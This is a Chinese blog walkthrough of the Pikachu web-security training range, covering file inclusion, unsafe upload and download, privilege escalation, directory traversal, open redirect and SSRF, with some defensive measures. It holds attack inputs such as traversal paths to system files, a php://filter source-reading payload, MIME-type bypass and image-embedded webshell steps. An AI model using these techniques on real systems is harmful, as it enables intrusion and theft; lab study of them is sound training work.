<p>本地文件包含漏洞<br>随便选择一个点击提交<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们观察url，显示是一个文件file1.php<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>按照设计这些文件都是后台自己存在的文件。但是由于这个我呢见名是前端传向后台的，也就意味着我们可以直接通过url修改这个文件。<br>假设我们该后台的操作系统是win11，其中有很多固定的配置文件,我们可以多敲几个…&#x2F;…&#x2F;…&#x2F;…&#x2F;…&#x2F;…&#x2F;…&#x2F;…&#x2F;…&#x2F;跳转到根目录，我们将文件名替换。<br>..&#x2F;..&#x2F;..&#x2F;..&#x2F;Windows&#x2F;System32&#x2F;drivers&#x2F;etc&#x2F;hosts<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>所有的配置文件就暴露出来了。</p>
<p>远程文件包含漏洞<br>远程文件包含漏洞形式和本地文件包含漏洞差不多，在远程包含漏洞中，攻击者可以通过访问外部地址来加载远程代码。<br>远程包含漏洞前提，如果使用的是include和require函数，则需要php.ini配置如下（php5.4.34）：<br>allow_url_fopen&#x3D;on &#x2F;&#x2F;默认打开<br>allow_url_include&#x3D;on &#x2F;&#x2F;默认关闭<br>写入一句话木马，危害极大。</p>
<p>打开远程包含，否则无法进行靶场训练。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ></p>
<p>选择一个提交，观察url<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>它实际上提交的是一个目标文件的路径，我们可以改成一个远端的路径，读取远程文件。</p>
<p>在这里我们使用pikachu提供的测试文件，yijuhua.txt<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ></p>
<p>将文件替换成远程路径，构造url，访问yijuhua.txt<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ></p>
<p>这时会自动生成一个yijuhua.php文件<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ></p>
<p>然后我们通过yijuhua.php构造url<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们可以发现ipconfig执行了。</p>
<p>文件包含漏洞防范措施<br>0.在功能设计上尽量不要将文件包含函数对应的文件放给前端进行选择和操作。<br>1.过滤各种.&#x2F;. ,http:&#x2F;&#x2F; ，https:&#x2F;&#x2F;<br>2.配置php.ini配置文件:<br>allow_ url fopen &#x3D; off<br>Allow_ url include&#x3D; off<br>magic quotes_ gpc&#x3D;on &#x2F;&#x2F;gpc在<br>3.通过白名单策略，仅允许包含运行指定的文件,其他的都禁止。</p>
<p>Unsafe file downloads(不安全的文件下载)<br>很多网站都会提供文件下载功能，即用户可以通过点击下载链接,下载到链接所对应的文件。但是，如果文件下载功能设计不当，则可能导致攻击着可以通过构造文件路径，从而获取到后台服务器上的其他的敏感文件。( 又称:任意文件下载)</p>
<p>正常功能点击球员名字，就可以下载图片。我们以点击科比为例，右键，新建标签页打开文件<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们可以直接修改filename的值去下载其他图片，我们还可以使用目录遍历的方式去修改链接下载敏感文件。<br>防范措施：<br>1.对传入的文件名进行严格的过滤和限定<br>2.对文件下载的目录进行严格的限定<br>Unsafe file upload(不安全的文件上传)<br>文件上传功能在web应用系统很常见，比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后，后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等，然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨，则攻击者可能会上传一些恶意的文件，比如一句话木马，从而导致后台服务器被webshell。</p>
<p>文件上传漏洞测试流程<br>1、上传文件，查看返回结果（路径，提示等）<br>2、尝试上传不同类型的“恶意”文件，比如xx.php文件，分析结果<br>3、查看html源码，看是否通过js在前端做了上传限制，想办法绕过<br>4、尝试使用不同方式进行绕过：黑白名单绕过&#x2F;MIME类型绕过&#x2F;目录0x00截断绕过等<br>5、猜测或者结合其他漏洞（比如敏感信息泄露等）得到木马路径，连接测试</p>
<p>client check<br>我们发现只能上传图片，上传其他文件会显示上传的文件不符合要求，请重新选择。<br>我们按下F12并打开后台源码查看<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>发现前端对文件进行了限制，我们可以直接使用发者工具把前端的onchang函数删掉。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>再次上传，上传成功。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>MIME type<br>MIME（多用途互联网邮件扩展类型），是设定某种扩展名的文件用一种应用程序来打开的方式类型，当该扩展文件被访问的时候，浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名，以及一些媒体文件打开方式。<br>每个MIME类型由两部分组成，前面是数据的大类别，例如声音audio、图像image等，后面定义具体的种类，常见的MIME类型，比如：<br>超文本标记语言文本.html texthtml<br>普通文本.txt text&#x2F;plain<br>RTF文本.rtf application&#x2F;rtf<br>GIF图形.gif image&#x2F;gif<br>JPEG图形.ipeg.jpg image&#x2F;jpeg</p>
<p>通过使用PHP的全局数组$_FILES，你可以从客户计算机向远程服务器上传文件。<br>第一个参数是表单的input name，第二个下标可以是”name”,“type”,“size”,“tmp_name”或”error”</p>
<p>我在这里上传了一个shell.php文件，提示如下<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们使用bp抓包，并且发送到repeater，修改content-type为图片类型，点击发送<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>通过http头的修改绕过了MIME type验证，之后就是访问传参，通过一句话木马控制服务器。<br>getimagesize()<br>getimagesize()：它是php提供的，通过对目标文件的16进制进行读取，通过该文件的前面几个字符串，来判断文件类型。<br>getmagesize()返回结果中有文件大小和文件类型。<br>固定的图片文件，十六进制的头部的前面的几个字符串基本上是一样的，比如说png格式的图片，所有png格式的图片前面的十六进制都是一样的。<br>思路：我们就是要通过伪造十六进制的头部字符串来绕过getimagesize()函数，从而达到上传的效果。</p>
<p>那么如何制作图片马？<br>我们首先桌面要有1.png和2.php，通过命令将两个合成一个ccc.png，生成的文件前面内容是1.png，后面是2.php内容。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们将ccc.png上传<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>虽然我们绕过getimagesize()，成功上传图片，但只访问图片里面的php代码是执行不了的，下面我们需要想办法让其执行。<br>我们结合本地文件包含漏洞，上传图片路径，注意相对路径的问题，要在前面加上unsafeupload。<br>unsafeupload&#x2F;uploads&#x2F;2022&#x2F;12&#x2F;13&#x2F;4115216397f2cf994ea732428763.png<br>over permission （越权漏洞）<br>越权漏洞概述<br>由于没有用户权限进行严格的判断，导致低权限的账号(比如普通用户)可以去完成高权限账号( 比如超级管理员)范围内的操作。<br>平行越权: A用户和B用户属于同一级别用户,但各自不能操作对方个人信息, A用户如果越权操作B用户的个人信息的情况称为平行越权操作<br>垂直越权。A用户权限高于B用户 , B用户越权操作A用户的权限的情况称为垂直越权。<br>越权漏洞属于逻辑漏洞,是由于权限校验的逻辑不够严谨导致。<br>每个应用系统其用户对应的权限是根据其业务功能划分的,而每个企业的业务又都是不一样的。<br>因此越权漏洞很难通过扫描工具发现出来,往往需要通过手动进行测试。</p>
<p>水平越权<br>先进行登录，提示里查看账号密码。有一个功能点击查看个人信息。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>再点击按钮时，向后台提供了一个get请求。提供了当前用户的用户名，然后后台将其信息返回到前台。我们在url中把Lucy改成其他人看看能不能查到信息。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>虽然登录的是lucy的账号，但是却返回了kobe的信息。</p>
<p>垂直越权<br>先登录超级管理员，去执行只有管理员才可以操作的新增账号的功能，用burp抓包。退出登录。登录普通用户，执行新增账号操作。如果成功，则存在垂直越权漏洞。</p>
<p>登录超级管理员，添加用户，使用bp抓包<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>将其发送到repeater，并且放包，查看数据<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>退出登录，登录普通用户<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>使用http历史记录也可查看数据包，找到登录pikachu用户的数据包。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们将普通用户的cookie复制（cookie就是普通用户的登录态），粘贴在重发器中所对应的cookie位置，<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>现在就相当于使用普通用户登录，然后实现添加用户操作，我们点击发送<br>回到页面刷新，我们看到又有一个zhnag用户。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>说明存在垂直越权漏洞。<br>…&#x2F;…&#x2F;(目录遍历)<br>目录遍历漏洞概述<br>在web功能设计中,很多时候我们会要将需要访问的文件定义成变量，从而让前端的功能便的更加灵活。 当用户发起一个前端的请求时，便会将请求的这个文件的值(比如文件名称)传递到后台，后台再执行其对应的文件。 在这个过程中，如果后台没有对前端传进来的值进行严格的安全考虑，则攻击者可能会通过“…&#x2F;”这样的手段让后台打开或者执行一些其他的文件。 从而导致后台服务器上其他目录的文件结果被遍历出来，形成目录遍历漏洞。<br>看到这里,你可能会觉得目录遍历漏洞和不安全的文件下载，甚至文件包含漏洞有差不多的意思，是的，目录遍历漏洞形成的最主要的原因跟这两者一样，都是在功能设计中将要操作的文件使用变量的 方式传递给了后台，而又没有进行严格的安全考虑而造成的，只是出现的位置所展现的现象不一样，因此，这里还是单独拿出来定义一下。<br>需要区分一下的是,如果你通过不带参数的url（比如：<a target="_blank" rel="noopener" href="http://xxxx/doc%EF%BC%89%E5%88%97%E5%87%BA%E4%BA%86doc%E6%96%87%E4%BB%B6%E5%A4%B9%E9%87%8C%E9%9D%A2%E6%89%80%E6%9C%89%E7%9A%84%E6%96%87%E4%BB%B6%EF%BC%8C%E8%BF%99%E7%A7%8D%E6%83%85%E5%86%B5%EF%BC%8C%E6%88%91%E4%BB%AC%E6%88%90%E4%B8%BA%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E3%80%82">http://xxxx/doc）列出了doc文件夹里面所有的文件，这种情况，我们成为敏感信息泄露。</a> 而并不归为目录遍历漏洞。</p>
<p>点击超链接<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>实际上是向后台发送了一个文件名。我们可以修改文件名。修改成…&#x2F;dir.php上级目录下的dir.php，可以发挥想象访问更多内容。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>敏感信息泄露<br>敏感信息泄露概述<br>由于后台人员的疏忽或者不当的设计，导致不应该被前端用户看到的数据被轻易的访问到。 比如：<br>1、通过访问url下的目录，可以直接列出目录下的文件列表;<br>2、输入错误的url参数后报错信息里面包含操作系统、中间件、开发语言的版本或其他信息;<br>3、前端的源码（html,css,js）里面包含了敏感信息，比如后台登录地址、内网接口信息、甚至账号密码等;<br>类似以上这些情况，我们成为敏感信息泄露。敏感信息泄露虽然一直被评为危害比较低的漏洞，但这些敏感信息往往给攻击着实施进一步的攻击提供很大的帮助,甚至“离谱”的敏感信息泄露也会直接造成严重的损失。 因此,在web应用的开发上，除了要进行安全的代码编写，也需要注意对敏感信息的合理处理。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ></p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ></p>
<p>URL跳转<br>不安全的url跳转问题可能发生在一切执行了url地址跳转的地方。<br>如果后端采用了前端传进来的(可能是用户传参,或者之前预埋在前端页面的url地址)参数作为了跳转的目的地,而又没有做判断的话就可能发生”跳错对象”的问题。</p>
<p>url跳转比较直接的危害是:<br>–&gt;钓鱼,既攻击者使用漏洞方的域名(比如一个比较出名的公司域名往往会让用户放心的点击)做掩盖,而最终跳转的确实钓鱼网站。</p>
<p>我们点击第四个链接：<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我看观察url发生了跳转，我们可以直接修改url，跳转到百度<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们可以利用url重定向来构造一些恶意网站，执行跳转。<br>SSRF（服务端请求伪造）<br>概述：SSRF(Server-Side Request Forgery:服务器端请求伪造)<br>其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制，导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。<br>数据流:攻击者—–&gt;服务器—-&gt;目标地址</p>
<p>根据后台使用的函数的不同,对应的影响和利用方法又有不一样</p>
<p>PHP中下面函数的使用不当会导致SSRF:<br>file_get_contents()<br>fsockopen()<br>curl_exec()</p>
<p>如果一定要通过后台服务器远程去对用户指定(“或者预埋在前端的请求”)的地址进行资源请求,则请做好目标地址的过滤。</p>
<p>SSRF(curl)<br>在pikachu靶场中，点击蓝色的a标签后，可以看到浏览器URL中它传了一个url参数<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>打开后端源代码，可以看到它是从前端获取了url请求，curl_init函数会对它进行初始化，然后curl_exec函数会去执行请求，最终又将请求结果返回到前端。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们可以通过传入一个其他的地址来演示。<br>在URL中传入百度的地址(<a target="_blank" rel="noopener" href="http://www.baidu.com),可以看到页面显示出了百度的数据库/">www.baidu.com)，可以看到页面显示出了百度的数据库</a> (它的流程和分析的源代码流程是一样的，前端传入参数，后端通过curl_exec去请求百度，最后把请求返回的百度数据返回到前端)<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>为了演示，我在pikachu的test文件夹中新建了一个txt文件，内容如图片所示<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>接下来把这个2.txt文件的地址输入到pikachu中</p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1/pikachu/test/2.txt">http://127.0.0.1/pikachu/test/2.txt</a><br>提交这个url后，pikachu页面显示出了2.txt文件中保存的内容<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>这样也就意味着我们可以通过SSRF这个漏洞，对后端服务器同一个网络的其他服务器进行相关的扫描、探测,获取更多的资源，然后更进一步的进行攻击。</p>
<p>SSRF(file_get_content)<br>打开pikachu靶场，点击蓝色标签，可以看到和前面是一样的，都是通过URL上传参数到后台获取信息的<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>查看后端代码，它和前面的逻辑是一样的，不同的是它这里使用file_get_contents函数进行文件的读取执行，而file_get_contents函数可以对本地文件进行读取，也可以对远程文件进行读取。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们可以像前面测试的一样，在URL中去输入百度的地址。它一样也会通过http协议去获取百度的资源<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ></p>
<p>我们也可以像前面一样，去访问我们之前在pikachu保存的txt文件<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>接下来，比如我们想知道它后台的PHP是怎么写的，可以通过构造一个payload去获取后台的PHP源码</p>
<p>php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;ssrf.php<br>提交payload后，可以看到页面显示出了转换后的php的base64编码<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>然后我们可以复制获取的base64编码到相关的解码网站进行解码从而得到PHP的源码<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ></p>
</div><div class="post-reward"><div class="post-reward-btn" title="赞赏作者"><img src="/assets/images/svg/uc/uc-gift.svg" class="icon noview" alt="Icon"><span></span></div><div class="post-reward-content"><div class="post-reward-text"></div><div class="post-reward-list"><a href="/null" target="_blank">致谢名单</a></div></div></div><div class="post-copyright"><div class="post-copyright-info">本作品由 stackTang 于 2026-06-22 20:48:39 发布</div><div class="post-copyright-link"><span>作品地址：<a href="http://example.com/2026/06/22/pikachu%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/">pikachu靶场通关</a></span><button class="copy-text" type="button" data-text="http://example.com/2026/06/22/pikachu%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/">复制</button></div><div class="post-copyright-detail">除特别声明外，本站作品均采用 <a href='https://creativecommons.org/licenses/by-nc-sa/4.0/' title='Attribution-NonCommercial-ShareAlike' target='_blank'>CC BY-NC-SA 4.0</a> 许可协议，转载请注明来自 <a href='/'>stackTang Blog</a></div><img class="post-copyright-icon noview" src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></div><div class="post-tail-tags"><a class="post-tail-tags-link" href="/tags/CTF/" rel="tag">CTF</a><a class="post-tail-tags-link" href="/tags/%E5%AD%A6%E4%B9%A0/" rel="tag">学习</a><a class="post-tail-tags-link" href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag">靶场</a></div><div class="post-nav"><a class="post-nav-prev" href="/2026/06/22/php%E5%9F%BA%E7%A1%80-%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" title="php基础-环境配置">上一篇<span>php基础-环境配置</span></a><a class="post-nav-next" href="/2026/06/22/pwn000%E5%89%8D%E7%BD%AE%E8%AF%B4%E6%98%8E/" title="pwn000前置说明">下一篇<span>pwn000前置说明</span></a></div><div class="comment"><div id="waline"></div></div></div><aside id="post-sidebar" status="show"><div id="toc-container"><div class="toc-title"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"><span>目录</span></div><div class="toc-content" id="toc-div"><ol class="toc-list"><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#711%E6%97%A5%E5%BF%97"><span class="toc-list-text">711日志</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#pikach%E9%80%9A%E5%85%B3"><span class="toc-list-text">pikach通关</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="toc-list-text">暴力破解</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#Cross-Site-Scripting"><span class="toc-list-text">Cross-Site Scripting</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#CSRF-%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0%E6%BC%8F%E6%B4%9E"><span class="toc-list-text">CSRF(跨站请求伪造漏洞)</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#CSRF-GET"><span class="toc-list-text">CSRF(GET)</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#CSRF-PSOT"><span class="toc-list-text">CSRF(PSOT)</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#CSRF-Token"><span class="toc-list-text">CSRF Token</span></a></li></ol></li></ol></li></ol></div></div></aside></div></div><div id="toolbar" hide=""><div id="toolbar-setting-container" hide=""><div class="toolbar-item"><button id="tool-color-mode" title="深色模式" type="button"><img src="/assets/images/svg/ta/ta-moon.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button class="copy-text" id="tool-share" title="分享" type="button" data-text="http://example.com/2026/06/22/pikachu%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/"><img src="/assets/images/svg/ta/ta-share.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-plus" title="放大字体" type="button"><img src="/assets/images/svg/ta/ta-text-plus.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-minus" title="缩小字体" type="button"><img src="/assets/images/svg/ta/ta-text-minus.svg" class="icon noview" alt="Icon"></button></div></div><div class="toolbar-container"><div class="toolbar-item"><button id="tool-setting" title="设置" type="button"><img src="/assets/images/svg/ta/ta-setting.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-toc" title="目录" type="button"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-gototop" title="返回顶部" type="button"><img src="/assets/images/svg/ta/ta-up.svg" class="icon noview" alt="Icon"></button></div></div></div><div class="search-overlay"><div class="search-container"><div class="search-header"><div class="search-title"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M10 10m-7 0a7 7 0 1 0 14 0a7 7 0 1 0 -14 0" /><path d="M21 21l-6 -6" /></svg>
搜索</div><div class="search-close-btn"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 21a9 9 0 0 0 9 -9a9 9 0 0 0 -9 -9a9 9 0 0 0 -9 9a9 9 0 0 0 9 9z" /><path d="M9 8l6 8" /><path d="M15 8l-6 8" /></svg></div></div><div class="search-input-box"><input id="search-input" type="search" placeholder="请输入关键词进行站内搜索……" value="" maxlength="80"/></div><div class="search-result-container"><div class="search-result-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M10 10m-7 0a7 7 0 1 0 14 0a7 7 0 1 0 -14 0" /><path d="M21 21l-6 -6" /></svg></div></div></div></div><div id="music-player"></div></main><footer><div class="footer"><div id="footer-copyright">© 2026 <span>💗</span> <a href="/null">stackTang</a></div><div id="footer-info"><div id="footer-framework">🚀本站由 <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/chanwj/hexo-theme-meow" title="3.3.2" target="_blank">Meow</a> 强力驱动</div><div id="footer-runtime"><span id="runtime" data-startdate="2026-07-13T23:13:13.000Z">🌻已稳定运行.年.月.天</span></div></div></div></footer><div class="scripts"><script>const GLOBALCONFIG = {
  root: '/',
  toolbar: true,
  lazyload_src: '/assets/images/Meow-Loading.webp',
  friends: false,
  album: '',
  codeblock: true,
  code_copy_text: false,
  share_text: '🐱Share From Meow',
  onblur_title: 'Please Come Back～✧(´▽`ʃ♡ƪ)',
  mouse_click: false,
  notify:{
    enable: false,
    info: '复制成功～转载请标注本文地址',
    f12_info: '开发者模式已打开，请遵循本站版权协议'
  },
  search: {
    enable: true,
    path: 'search.xml',
    local: {
      top_n_per_article: 1,
      preload: false
    }
  },
  encrypt: false,
  category: false,
};
</script><script>if (!localStorage.getItem('color-mode')) {
  localStorage.setItem('color-mode', 'light' || 'light');
}
document.body.setAttribute('data-mode', localStorage.getItem('color-mode'));
</script>
<script src="/js/theme/tools/utils.js"></script>

<script src="/js/plugins/dist/lazyload.min.js"></script>

<script src="/js/plugins/view-image.min.js"></script>
<script>if (localStorage.getItem('font-size')) {
  document.querySelector('.post').style.fontSize = localStorage.getItem('font-size') + 'px';
}
</script><script>(() => {
  let initFn = window.walineFn || null

  const initWaline = (Fn) => {
    const waline = Fn(Object.assign({
      el: '#waline',
      serverURL: 'https://dischat-9perr1k34-tangriweilis-projects.vercel.app',
      lang: 'zh-CN',
      dark: 'body[data-mode="dark"]',
      emoji: null,
      reaction: null,
      path: window.location.pathname.replace(/([^\/#]+)(?:#.+|)$/,'$1/'),
    }, null))
  }

  const loadWaline = async () => {
    if (initFn) initWaline(initFn)
    else {
      let jsPath = ''
      if (false) {
        jsPath = 'dist/waline.js'
      } else {
        jsPath = '/js/plugins/dist/waline.js'
      }
      const { init } = await import(jsPath)
      initFn = init || Waline.init
      initWaline(initFn)
      window.walineFn = initFn
    }
  }

  if (true) {
    meow.lazyloadFn(document.getElementById('waline'), loadWaline)
  } else {
    loadWaline()
  }
})()</script>
<script src="/js/plugins/dist/APlayer.min.js"></script>
<script>const initAplayer = (data) => {
  if (!data.length) return;

  const ap = new APlayer({
    container: document.getElementById('music-player'),
    fixed: true,
    autoplay: false,
    theme: '#FFB347',
    loop: 'all',
    order: 'list',
    volume: 0.7,
    lrcType: 3,
    audio: data
  });

  ap.on('play', () => {
    document.getElementById('music-player').setAttribute("play", "");
  });
  ap.on('pause', () => {
    document.getElementById('music-player').removeAttribute("play");
  });
};

const fetchData = () => {
  fetch('')
    .then(res => res.json())
    .then(result => initAplayer(result));
};

if ('') {
  document.addEventListener("DOMContentLoaded", fetchData);
} else {
  document.addEventListener("DOMContentLoaded", initAplayer());;
}</script>
<script src="/js/plugins/dist/search.js"></script>

<script src="/js/main.js" type="module"></script>
<script src="https://fastly.jsdelivr.net/npm/live2d-widget@3.1.4/lib/L2Dwidget.min.js"></script><script>(function () {
  const initLive2D = function () {
    if (!window.L2Dwidget) return;
    window.L2Dwidget.init({"model":{"jsonPath":"https://fastly.jsdelivr.net/npm/live2d-widget-model-hijiki@1.0.5/assets/hijiki.model.json","scale":1},"display":{"position":"right","width":150,"height":300,"hOffset":150,"vOffset":-15},"mobile":{"show":true,"scale":0.55},"react":{"opacityDefault":0.88,"opacityOnHover":0.25}});
  };
  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', initLive2D, { once: true });
  } else {
    initLive2D();
  }
})();</script></div></body></html>